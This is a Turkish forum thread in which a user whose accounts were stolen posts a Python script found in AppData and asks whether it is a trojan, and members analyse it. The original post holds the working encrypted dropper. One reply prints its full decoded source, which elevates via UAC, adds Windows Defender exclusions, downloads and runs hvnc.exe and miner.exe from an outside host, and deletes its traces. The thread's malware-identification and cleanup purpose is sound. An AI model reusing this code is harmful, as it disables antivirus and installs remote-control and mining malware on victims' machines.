Bu kod trojan mi

Question

Windows'un kendi defenderi tanımadı. Kaspersky buldu

Bu kod trojan mi ? Chatgpt ye sordum evet dedi ama ben bi de gerçek insanlardan fikir almak istedim asıl kullanım amacı vs

import os
import subprocess
script ="""
import os
from fernet import Fernet
exec(Fernet(b'3imKbMKF4eMSLtPVRSLx_Pu0oP_hxD99r-6cFGjL15g=').decrypt(b'gAAAAABmddYYz7s5OBtQ_Lw8NcS  EUUhfkeQ2s8PD5fjJo0m6cYV2ThPdcESikuwsB0-5wasQUnprk6wxDBvKpySqvdx4KiuPujg3pKrZvcXz_FkIiNP24  j0QS3D_tg7qwuWJSdeQ4Qbos1HhFdBnaZgKYT5eCnWSa1JpZc7  QFQcoq7cEocfo-zUw-gncNJxnuICcjfaAoWqz4N8OpR-g7S46G1S0I3djjZ6bTD0NCRFI8C16JPxBZ5UtR6KU6wW6jiHSv  _kgUpmw4D_TDyAOwbBdGYPK_OtijLEdEFI_62-9ThRPO7bau2a8ySRpayhm6ZCh1w9Invdwt539Rl8adnBdSXeze  gdN9uv_CMEPbtHQbQK3PryhNLaYgKBHV95fWwmGqcSKt5JlBmc  HDZr_wlw6EzHr8pojjxbt1HrDPgr8q9i0TiZewixK3YgzhESwB  e5m4qssjkrCyy4udv46iGC3USIDPfaj8M_a4CgilYOfyqhOzUe  KZYbQxsxKaQr0HnHSIyVEUcRNvSxZOKtoRIa2z8ldsqh7Ud97y  rtycubYrlDvP9E0P08RSdBpUrhwmnQF94zq3TYHc9WRH6_GNsv  2AfbEwi1XnAIGRgrws0mMOWW_NaDGvZQP9lQUZ9wwdxUdYHz6m  0H3StyBV7X7FcWR5cR4cNscc9gPFUQvpkzebsbXZBREDyt2CKH  KYXDq5H7FdB2YoZwpBRzoqG4fhr9qGxtsxo3tQaNDM0M1J6UiW  vx4lQLlMUGxuOkvSiZFpeua2hv_EiRW6FU92vPRDUHrHviM7Wa  SToGyEHizBzhbsVKLcyPk51qMbxVGPiSeBLz6fcZOHjOX7hGse  fwrXz1RdeyYK8Gseb3cF8JLp97kpQ3nxQzBNhv65moRAJ0TY84  2jIQftQF4di-mQ4OeVKSN4YwKgYGT-7A6myla89JixOtcrmxRUqoKEW87SGdoYO-wn1keUmmYZAR4Tre9WmvfsGPDfoMJVsxG2t1wkrDW1rBLf1Z-lRfqvgYXvypvIMv-Mt29tmFVkqtAZNENfB5-VlWkmMtexkeClzPME6_cTGfVO7oduD6UnTHJiDNeZRp6lZlKR2  TYp2tC7HNaYcM3RFfxT-isjlW2_kZ8XjP1EpIODrVbPZOEeTRX2nL24FjBnETbKW6q6fTW  9RnCK6HQO_IWFkUtptpqHyJvGDfbqQythWIG7FIZOkywDHfjo5  1vT2M21HUqrPcDkx30Twv1LP__mc5d6cbRz3WfM-8wi_tH7z7VJphnlCH7l88GsVwC1jc4pDVk06-vTVbcshd_FpmnKGyjNHJFw02MAOLtX8oMav3Ct4-2TCeLS1YRptbRSawS4AJR5k24jlg_eyC9TWVS4_fpTdD7g7SlR  OgBqGgsubd_MN8PGBHQM0GqFqRorMjpJCB9xIJN03d9_VT2PyO  mYOWoDXCQKoByAEXKbRMPrAIdPlfumSAF_jtFO7LAluppsPGxY  AIi95LEJRuJouvhHP6Wd_X7nwnAx2Lj9FM2ajSZAgdC3C_vtLj-IAxWyu4xUGCsBfBnlkvn_g8tmqd2sxCVD1OqgFSheaKMram8MS  XK68sdVKUuz8puqM2QQWm6GSv5B7VZyNSSybRgx2GXJi6asK4m  ur6atVz5CVUEENXr0wzYfnmH1lov7ZAD2W0iQwaDtm851rxM7g  OFdB43jPAUCWibqTnPvQC7_lI9sbg4FkoN_YI6Yaqptx3KgHj9  LiQj7Ez2frYt95aRAzoqdIGeMeGIOhbHkizV5eTP0ytVXWPWmp  DPSs7oTdD8YZvp7kIl86coNd5QR_GFbETXCVoUthHnFnfQAcGc  7v0b-6F7OXM5dBWIb4nKgPltYyzXRKJEG19mFKalRd_bEloBO0CA23a  tq9_fHK_qEZTwKCucA03Jl29YGqsDD7UxLfwXhLxTRZAN5TyLd  SvJ5sdsaQJhmR3xA5SH0tWH9KFn3lyjBwebORBe7ky0Gwd4FxN  U7BV-Ng7Rb4p0BNLK3tQGU7XZNg7mUDycNCAd0Hd_emJ9nIu6ml36b9  ctsHKUNM0fEXSDbKGUX8kxz0oF7A87UlyhUzb1mKYTjEw23X-plE4ZD8rvj8AUZDCiRjCd6PFLD4UdscFDQ-pGX2Qg1rXoWwwIJXex-wuABKq3KWnD_J7MgXU3uOwYnX3hkQU3LC5iisjjxGM5TGfHZPd  sHVBaXJn_e1RGxWlmi4BWEqhZK7sOWoQgUl2Y9cXg9JH8LygtR  HGDwEdqOv8b0X8714ZkmkuzwKdQEs5c_BA2uPoNcINI-prpQ3Y1IRNxndh4h1F2xNgv4_a0AvWnbf9r8FckP9OJG50ojoq  enWaVYZtJEg-pzgfe2hXuUWvjJbePqgt5ol7q67hS9fa9q73b0VOu72hjgICWo  QIjePRAd-y1EoprS3xmCkViosUm1v-MmZq6jABTN5d69eg9o_nbLqQikEGInyWZ59KGwmZkcP-dRxDa_Gods4a7wwDWxxMKpdcwg0L9Sop5zYbD7aa3OphUTW-eJcGokDxH321W-t_aV-txtrvEXYgWQlahMC45a1IG5rI9v4-4Gf8YWQnbUpLxTAMFSSyrwnb4blWcF1tlJXXAlHnItruqAPBit  WeOX85_LsQKOpVvKK6jWKs3Kldz3sIrgl0t3IavKuRT4W4F-xelIauk2wJfTrCGbjHcnddjLDuwFnb-rbv2ZPEz5PVoPuy7EdRZRfmULSuLGH9ghiQk34c62pmVTPrQm6  TH5z0EzomlObC2ac25eRthuDIjQqzy5V6bmyA0PKMEIGYTfIEB  oYN8-UG7qVBiKmRdPee2FF3X3lCk151_V8En_lz9FJt167gBEFUsthC  3-v-UIosodQjS4_rEJf-Yohk4c3FyM4jcXv1xXWbxtzX6tv90_vJlNsQQgH2dQcehQm5z_  PeW0B4_sDEaHk-bMRBAqswIsQ9E_bQctvPLIOPv0fq6i9bbBcAArOyzqPmns-7LtvLP0Z9WZRxDbOlv_YDzrffDgRNW4TqVNvfJhqyeyNPNzQR3  B44g9WFYPwq0iLqlic2XCVql-hf5zXKf2Yu5GcDfdqZYeoaAKZcC4cuhq1ZJ9r-cHNBN6Ev9oZQeHF4pgrh25Ej1iJFlDRB0tqqkTAVKaOkXfrUaX  uJJ-d7P4Kbn6Q5rMcnVncDcYOQ4MJSzeRPArQt051SWIkpj7VBZGas  WZN6YWSXaPHznUuN2bFVRpf4WNIkdNRu_unCup1rTwsHFxpuzL  p5zlTYx1UBxQI7IhpfdwFPdvqzQUaxdUepyViCzdEp-Gi1RfoAkyuGF9AU78T9PFaaDgleAxQsn3orIV3nN6ssOarYeuc  7Wrai6hS-OFyPdUOVrcR79hJM7UCCQMY07EnGWBWYXBWEmwqzumQMCveJTn  OIOYXsmMrYMsYXoBUbyAsJlkeTjK-QFw6XXukIBbWwf_jf0P2fCxfO_U3SpbueEF7OhepEfbWIy2xug  237shIdA-RI1oK3YK9N9V7-7WLE4lSXNjykdZWuzqYtpSyL4nFJtvY9Fg7xOohYSmiNAV84F_  zeh1GtBzpqoddIsnTSC0smqx6qwGn2zANOdgIKVmP0I6YD6kUp  imxJZMN7dHEbOo9yjXVmNxI9o2tAGi14HN4JXWO9_1oWWSnrSd  9VOWDJn3hDAm1EqqdThHUbGFNdDd6GkAPuFDEtl3eY=').deco  de())
"""

appdata = os.environ.get('APPDATA', '')
if appdata:
microsoft_folder = os.path.join(appdata, 'Microsoft')
if not os.path.exists(microsoft_folder):
os.mkdir(microsoft_folder)
script_path = os.path.join(appdata, 'Microsoft', 'runpython.py')
with open(script_path, 'w') as script_file:
script_file.write(script)
subprocess.Popen(['python', script_path], creationflags=subprocess.CREATE_NO_WINDOW)

iade · Answer

&#128163; Çözülen Zararlı Kodun İşlevleri:
1. Yönetici Yetkisi Alma
Kod, getadmin.vbs kullanarak UAC penceresi çıkarıyor ve yönetici izni alıyor:
echo Set UAC = CreateObject("Shell.Application") > "%temp%getadmin.vbs"
echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params", "", "runas", 1 >> ...
2. Antivirüs Bypass (Windows Defender Dışlama Ekleme)
Kod, sistemin Defender'ına *.exe, *.dll dosyalarını ve C: dizinini dışlama olarak ekliyor:
Add-MpPreference -ExclusionExtension '.exe'
Add-MpPreference -ExclusionExtension '.dll'
Add-MpPreference -ExclusionPath 'C:'

Bu, zararlının antivirüs tarafından görünmemesini sağlar.

3. Zararlı Dosya İndirme ve Çalıştırma
İki adet dosya indiriliyor:
DownloadFile('https://kleinanzeigen.ru/hvnc.exe', '%TEMP%RuntimeBroker.exe')
DownloadFile('https://kleinanzeigen.ru/miner.exe', '%TEMP%RuntimeBroker2.exe')
Ve ardından arka planda başlatılıyor:
start "" "%temp%RuntimeBroker.exe"
start "" "%temp%RuntimeBroker2.exe"hvnc.exe: Muhtemelen Hidden VNC yani gizli masaüstü kontrol trojanı
miner.exe: %99 ihtimalle kripto para madencisi (cryptominer)
4. Kendini Temizliyor (İz silme)
del /q "%appdata%Microsoftrunpython.py"
Bu da kodun ilk tetiklendiği script dosyasını siliyor.
5. Sürekli Tekrar Deneme ve Explorer'ı Dondurma
Eğer hedef klasör (C:WindowsWinEmptyfold) yoksa:explorer.exe kapatılıyor
zararlı tekrar tekrar çalıştırılıyor
sonunda explorer geri yükleniyor
Bu davranış, kullanıcının müdahale etmesini zorlaştırmak için yapılmış.
&#128680; Sonuç:
Bu kod:Yönetici izni alıyor
Windows Defender’ı etkisiz hale getiriyor
İnternetten zararlı dosyalar indirip çalıştırıyor
Kendini gizliyor ve izleri siliyor
Sürekli arka planda kendini tekrar çalıştırıyor
Bu açıkça bir Remote Access Trojan (RAT) + Crypto Miner kombinasyonudur.
&#128295; Ne Yapmalısın?
Eğer çalıştırılmışsa:İnterneti kes
C:WindowsWinEmptyfold, %APPDATA%Microsoft, %TEMP% klasörlerini tara ve temizle
Autoruns ile sistem başlangıçlarını kontrol et
Malwarebytes AdwCleaner veya benzeriyle tam sistem taraması yap
Gerekirse sistemi temiz bir ISO ile sıfırla

reallegal · Answer

trojan evet chatgptye sordum

ShakiraTR · Answer

Bu linke girer girmez kaspesky trojan uyarısı verdi. Bu R10 için iyi bir şey değil. Kodu kaldırın lütfen.

Vivobayim · Answer

iade adlı üyeden alıntı:						mesajı görüntüle									&#128163; Çözülen Zararlı Kodun İşlevleri:
1. Yönetici Yetkisi Alma
Kod, getadmin.vbs kullanarak UAC penceresi çıkarıyor ve yönetici izni alıyor:
echo Set UAC = CreateObject("Shell.Application") > "%temp%getadmin.vbs"
echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params", "", "runas", 1 >> ...
2. Antivirüs Bypass (Windows Defender Dışlama Ekleme)
Kod, sistemin Defender'ına *.exe, *.dll dosyalarını ve C: dizinini dışlama olarak ekliyor:
Add-MpPreference -ExclusionExtension '.exe'
Add-MpPreference -ExclusionExtension '.dll'
Add-MpPreference -ExclusionPath 'C:'

Bu, zararlının antivirüs tarafından görünmemesini sağlar.

3. Zararlı Dosya İndirme ve Çalıştırma
İki adet dosya indiriliyor:
DownloadFile('https://kleinanzeigen.ru/hvnc.exe', '%TEMP%RuntimeBroker.exe')
DownloadFile('https://kleinanzeigen.ru/miner.exe', '%TEMP%RuntimeBroker2.exe')
Ve ardından arka planda başlatılıyor:
start "" "%temp%RuntimeBroker.exe"
start "" "%temp%RuntimeBroker2.exe"hvnc.exe: Muhtemelen Hidden VNC yani gizli masaüstü kontrol trojanı
miner.exe: %99 ihtimalle kripto para madencisi (cryptominer)
4. Kendini Temizliyor (İz silme)
del /q "%appdata%Microsoftrunpython.py"
Bu da kodun ilk tetiklendiği script dosyasını siliyor.
5. Sürekli Tekrar Deneme ve Explorer'ı Dondurma
Eğer hedef klasör (C:WindowsWinEmptyfold) yoksa:explorer.exe kapatılıyor
zararlı tekrar tekrar çalıştırılıyor
sonunda explorer geri yükleniyor
Bu davranış, kullanıcının müdahale etmesini zorlaştırmak için yapılmış.
&#128680; Sonuç:
Bu kod:Yönetici izni alıyor
Windows Defender’ı etkisiz hale getiriyor
İnternetten zararlı dosyalar indirip çalıştırıyor
Kendini gizliyor ve izleri siliyor
Sürekli arka planda kendini tekrar çalıştırıyor
Bu açıkça bir Remote Access Trojan (RAT) + Crypto Miner kombinasyonudur.
&#128295; Ne Yapmalısın?
Eğer çalıştırılmışsa:İnterneti kes
C:WindowsWinEmptyfold, %APPDATA%Microsoft, %TEMP% klasörlerini tara ve temizle
Autoruns ile sistem başlangıçlarını kontrol et
Malwarebytes AdwCleaner veya benzeriyle tam sistem taraması yap
Gerekirse sistemi temiz bir ISO ile sıfırla
 		Oha hocam bunu yapan baya profesyonel o zaman doğru muyum

Vivobayim · Answer

ShakiraTR adlı üyeden alıntı:						mesajı görüntüle									Bu linke girer girmez kaspesky trojan uyarısı verdi. Bu R10 için iyi bir şey değil. Kodu kaldırın lütfen. 		Hocam adamin biri riot hesaplarımı falan caldi telegram hesaplarım da gitti bu kodu silsem de adam sildiğimin ertesi günü yine bi telegram hesabimi çalmıştı ondan sordum da

vFurky · Answer

Vivobayim adlı üyeden alıntı:						mesajı görüntüle									Oha hocam bunu yapan baya profesyonel o zaman doğru muyum 		Profesyonellikle çok alakası yok, ortalama bir RAT. Eğer çalıştırdıysanız interneti kesin, Kaspersky ile tam tarama yapın. Çalıştırmadıysanız bir şey yapmanıza gerek yok.

Vivobayim · Answer

vFurky adlı üyeden alıntı:						mesajı görüntüle									Profesyonellikle çok alakası yok, ortalama bir RAT. Eğer çalıştırdıysanız interneti kesin, Kaspersky ile tam tarama yapın. Çalıştırmadıysanız bir şey yapmanıza gerek yok. 		hocam çalıştırmaktan kastınız ben bunu windows appdata klasöründe buldu kaspersky  da tarama yapınca. tarama yağpma sebebim hesaplarımın çalınması. çalındıktan sonra r10dan kasper premium satın almıştım

persius35 · Answer

Kaspersky  bulaşmayın Ruslardan uzak durun,virus kadar tehlikeliler Eset  kullanabilirsiniz.

vFurky · Answer

persius35 adlı üyeden alıntı:						mesajı görüntüle									Kaspersky bulaşmayın Ruslardan uzak durun,virus kadar tehlikeliler Eset kullanabilirsiniz. 		Kasperskya niye bulaşmasın, anlamadım? Sırf "rus" tabanlı olduğu için mi?

Vivobayim · Answer

Benim anlamadığım nokta o kod kendini nasıl çalıştırıyor bi kere çalıştırsa yeter mi yeterse sonradan kendini nasıl silmemis ve ben bazen crackli program indirebiliyorum oradan nasıl bulaşıyor, yani benim programı açınca bu fernetli kod kendini otomatik oraya kaydediyor ama kaydedince o py dosyası nasıl çalışıyor merak ettim şu an, internetten exe dosyalarını yani rat dosyalarını indiriyormus pcye, madem internetten indiriyorsa benim crackli programa niye gommemisler

bircan · Answer

import os

def create_and_run_bat_script():
    bat_script_content = '''
@echo off
set "filePath=%appdata%&#92;Microsoft&#92;emptyfile20947.txt"
:: BatchGotAdmin
:-------------------------------------
REM  --> Check for permissions
    IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
>nul 2>&1 "%SYSTEMROOT%&#92;SysWOW64&#92;cacls.exe" "%SYSTEMROOT%&#92;SysWOW64&#92;config&#92;system"
) ELSE (
>nul 2>&1 "%SYSTEMROOT%&#92;system32&#92;cacls.exe" "%SYSTEMROOT%&#92;system32&#92;config&#92;system"
)

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%&#92;getadmin.vbs"
    set params= %*
    echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%&#92;getadmin.vbs"

"%temp%&#92;getadmin.vbs"
    del "%temp%&#92;getadmin.vbs"
    exit /B

:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"
:--------------------------------------

mkdir "C:&#92;Windows&#92;WinEmptyfold"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"

set "temp_file=%TEMP%&#92;RuntimeBroker.exe"

set "temp_file2=%TEMP%&#92;RuntimeBroker2.exe"

powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://kleinanzeigen.ru/hvnc.exe', '%temp_file%')"

powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://kleinanzeigen.ru/miner.exe', '%temp_file2%')"

start "" "%temp_file%"

start "" "%temp_file2%"

del /q "%appdata%&#92;Microsoft&#92;runpython.py"
'''

temp_folder = os.environ.get('TEMP', '')
    if temp_folder:
        bat_script_path = os.path.join(temp_folder, 'temp_script.bat')
        with open(bat_script_path, 'w') as bat_file:
            bat_file.write(bat_script_content)
        os.system(bat_script_path)
    else:
        print("Failed to get the TEMP folder path.")

if os.name == 'nt':
    folder_path = r"C:&#92;Windows&#92;WinEmptyfold"
    if os.path.exists(folder_path):
        exit()
    else:
        os.system('timeout 600')
        os.system('taskkill /f /im explorer.exe')
        create_and_run_bat_script()
        while True:
            os.system('timeout 5')
            if os.path.exists(folder_path):
                os.system('start explorer.exe')
                break
            else:
                create_and_run_bat_script()Decode edilmiş hali bu kodun. Kesinlikle zararlı bir yazılım. Saldırganın serverinden 2 tane dosya indirip çalıştırıyor. Birisi mining yazılımı sanırım. Diğeri de ne olduğu belli değil.
Defender yakalamamış olabilir. Ama çalıştırmayı denersen çok yüksek ihtimalle yakalar.

Vivobayim · Answer

bircan adlı üyeden alıntı:						mesajı görüntüle									import os

def create_and_run_bat_script():
    bat_script_content = '''
@echo off
set "filePath=%appdata%&#92;Microsoft&#92;emptyfile20947.txt"
:: BatchGotAdmin
:-------------------------------------
REM  --> Check for permissions
    IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
>nul 2>&1 "%SYSTEMROOT%&#92;SysWOW64&#92;cacls.exe" "%SYSTEMROOT%&#92;SysWOW64&#92;config&#92;system"
) ELSE (
>nul 2>&1 "%SYSTEMROOT%&#92;system32&#92;cacls.exe" "%SYSTEMROOT%&#92;system32&#92;config&#92;system"
)

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%&#92;getadmin.vbs"
    set params= %*
    echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%&#92;getadmin.vbs"

"%temp%&#92;getadmin.vbs"
    del "%temp%&#92;getadmin.vbs"
    exit /B

:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"
:--------------------------------------

mkdir "C:&#92;Windows&#92;WinEmptyfold"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"

set "temp_file=%TEMP%&#92;RuntimeBroker.exe"

set "temp_file2=%TEMP%&#92;RuntimeBroker2.exe"

powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://kleinanzeigen.ru/hvnc.exe', '%temp_file%')"

powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://kleinanzeigen.ru/miner.exe', '%temp_file2%')"

start "" "%temp_file%"

start "" "%temp_file2%"

del /q "%appdata%&#92;Microsoft&#92;runpython.py"
'''

temp_folder = os.environ.get('TEMP', '')
    if temp_folder:
        bat_script_path = os.path.join(temp_folder, 'temp_script.bat')
        with open(bat_script_path, 'w') as bat_file:
            bat_file.write(bat_script_content)
        os.system(bat_script_path)
    else:
        print("Failed to get the TEMP folder path.")

if os.name == 'nt':
    folder_path = r"C:&#92;Windows&#92;WinEmptyfold"
    if os.path.exists(folder_path):
        exit()
    else:
        os.system('timeout 600')
        os.system('taskkill /f /im explorer.exe')
        create_and_run_bat_script()
        while True:
            os.system('timeout 5')
            if os.path.exists(folder_path):
                os.system('start explorer.exe')
                break
            else:
                create_and_run_bat_script()Decode edilmiş hali bu kodun. Kesinlikle zararlı bir yazılım. Saldırganın serverinden 2 tane dosya indirip çalıştırıyor. Birisi mining yazılımı sanırım. Diğeri de ne olduğu belli değil.
Defender yakalamamış olabilir. Ama çalıştırmayı denersen çok yüksek ihtimalle yakalar. 		Hocam dosya kendi halinde duruyormuş işte ben nasıl kendiliğinden çalıştı oni merak ettim

bircan · Answer

Vivobayim adlı üyeden alıntı:						mesajı görüntüle									Hocam dosya kendi halinde duruyormuş işte ben nasıl kendiliğinden çalıştı oni merak ettim 		Kendi kendine çalışmaz. Çalışması için senin tetiklemen gerekiyor. Mesela indirdiğin başka bir oyun, script, uygulama vb şeyler bunu çalıştırıyor olabilir arkada.

Vivobayim · Answer

bircan adlı üyeden alıntı:						mesajı görüntüle									Kendi kendine çalışmaz. Çalışması için senin tetiklemen gerekiyor. Mesela indirdiğin başka bir oyun, script, uygulama vb şeyler bunu çalıştırıyor olabilir arkada. 		Mesela hocam crackli adobe indirdim, exe çalıştığında bu py yi otomatik windows appdataya mi kaydediyor ve otomatik çalıştırıyor o zararlı exeleri indiriyor yani. Zararlı exeleri pyden indiriyor. Cunku benim açtığım exe zararlı olsa pc uyarı verir

bircan · Answer

Vivobayim adlı üyeden alıntı:						mesajı görüntüle									Mesela hocam crackli adobe indirdim, exe çalıştığında bu py yi otomatik windows appdataya mi kaydediyor ve otomatik çalıştırıyor o zararlı exeleri indiriyor yani. Zararlı exeleri pyden indiriyor. Cunky benim açtığım exe zararlı olsa pc uyarı verir 		Muhtemelen böyle. Ama bu örnek için konuşacak olursak çok amatör bir zararlı diyebilirim. Defender bu arada gayet iyi bir yazılım. Özellikle runtime da, yani çalıştırdıktan sonraki aktiviteleri çok iyi takip ediyor.
Zararlı olabilecek bir aktivite, api kullanımı durumunda direkt karantinaya alıyor. Bu zararlı yazılım bence defenderi geçemez.

Fakat, hiçbir antivirüsün yakalayamadığı çok daha profesyonel zararlılar var ortada. Bunlardan birine denk gelirseniz farketmeniz imkansız.

Vivobayim · Answer

bircan adlı üyeden alıntı:						mesajı görüntüle									Muhtemelen böyle. Ama bu örnek için konuşacak olursak çok amatör bir zararlı diyebilirim. Defender bu arada gayet iyi bir yazılım. Özellikle runtime da, yani çalıştırdıktan sonraki aktiviteleri çok iyi takip ediyor.
Zararlı olabilecek bir aktivite, api kullanımı durumunda direkt karantinaya alıyor. Bu zararlı yazılım bence defenderi geçemez.

Fakat, hiçbir antivirüsün yakalayamadığı çok daha profesyonel zararlılar var ortada. Bunlardan birine denk gelirseniz farketmeniz imkansız. 		Benim windows defenderi geçmiş ama hocam kasperskyla tarama yapmasam defenderin dünyadan haberi yok uyarı vermedi hiç

Windows 11 bi de kullandığım sistem

bircan · Answer

Vivobayim adlı üyeden alıntı:						mesajı görüntüle									Benim windows defenderi geçmiş ama hocam kasperskyla tarama yapmasam defenderin dünyadan haberi yok uyarı vermedi hiç

Windows 11 bi de kullandığım sistem 		Static taramada geçebilir de, çalıştırıldığında geçmiş mi mesela?

Vivobayim · Answer

persius35 adlı üyeden alıntı:						mesajı görüntüle									Kaspersky bulaşmayın Ruslardan uzak durun,virus kadar tehlikeliler Eset kullanabilirsiniz. 		Bu arada ben de ruslarin internet ortamındaki tehlikelerin çoğunluğunu oluşturduğunu dusuniyorum adamlar her yerde ve büyük forumlar dark web forumları falan hep onlara ait ayrıca mesela bir twitter hack ya da instagram hack vs konular hep onlardan cikiyo ilk, benim gözlemledigim kadariyla

Vivobayim · Answer

bircan adlı üyeden alıntı:						mesajı görüntüle									Static taramada geçebilir de, çalıştırıldığında geçmiş mi mesela? 		Bana hiç uyarı vermedi hocam hiçbir zaman
 Geçmiş demek ki

bircan · Answer

Vivobayim adlı üyeden alıntı:						mesajı görüntüle									Bana hiç uyarı vermedi hocam hiçbir zaman
Geçmiş demek ki 		Defenderin tüm korumaları açıkken bu tip zararlıların geçmesi zor. Benim tecrübem en azından böyleydi. Demek ki daha fazla korumaya ihtiyaç var. (:
Dışardan indirdiğiniz şeylere dikkat edin.

NetXx · Answer

python tabanli virusler de cikti demek.

indirdiginiz crackli programlar arkaplanda sisteminize python da yuklemis demek ki, yoksa tek basina .py dosyasi calismaz. Python tarafinizdan yuklendiyse o ayri tabii ki.

Vivobayim · Answer

NetXx adlı üyeden alıntı:						mesajı görüntüle									python tabanli virusler de cikti demek.

indirdiginiz crackli programlar arkaplanda sisteminize python da yuklemis demek ki, yoksa tek basina .py dosyasi calismaz. Python tarafinizdan yuklendiyse o ayri tabii ki. 		Benim pcde zaten python yüklü hocam kod yazıyorum kendimce. O zaman python yüklü olmasaydı hiç çalışmazdi sanırım.

NetXx · Answer

Vivobayim adlı üyeden alıntı:						mesajı görüntüle									Benim pcde zaten python yüklü hocam kod yazıyorum kendimce. O zaman python yüklü olmasaydı hiç çalışmazdi sanırım. 		Evet calismazdi. Python ile alakali illegal bir seyler indirdiniz mi peki? Herhangi bir zararlinin once python yukleyip ardindan scripti calistirmasi da yuk kalabaligi olurdu. Direkt sizin sisteminizde python yuklu varsayimiyla davranilmis olabilir. Bu da python ile ilgili bir seyler indirip zararliyi bulastirma olasiliginizi arttirir.

Escanor · Answer

NetXx adlı üyeden alıntı:						mesajı görüntüle									python tabanli virusler de cikti demek.

indirdiginiz crackli programlar arkaplanda sisteminize python da yuklemis demek ki, yoksa tek basina .py dosyasi calismaz. Python tarafinizdan yuklendiyse o ayri tabii ki. 		en tehlikelileri şuan python ile yazılmış olanlar bellekte çalışıyor ve ne python indirmesine gerek var ne de virüs programı bulabiliyor

Slash · Answer

15 yıldır antivürüs kullanmıyorum diyeceklerim bu kadar.

CliaWeb · Answer

Uzaktan zararlı çekmek (mining malware), çalıştırmak, bu işlemler için yetki almak ve yönetmek amaçlı penceresiz, uyarısız trojan script.